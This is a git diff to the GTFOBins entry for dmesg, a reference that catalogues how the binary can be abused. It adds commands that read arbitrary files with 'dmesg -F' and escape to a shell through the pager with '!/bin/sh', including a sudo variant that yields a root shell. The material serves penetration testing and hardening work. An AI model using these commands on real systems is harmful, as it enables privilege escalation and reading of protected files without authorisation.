diff --git a/_gtfobins/dmesg.md b/_gtfobins/dmesg.md index bb5d86f..4929632 100644 --- a/_gtfobins/dmesg.md +++ b/_gtfobins/dmesg.md @@ -1,9 +1,17 @@ --- -description: | - This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. functions: - sudo: + file-read: - code: | + LFILE=file_to_read + dmesg -F "$LFILE" + shell: + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + dmesg -H + !/bin/sh + sudo: + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | sudo dmesg -H !/bin/sh ---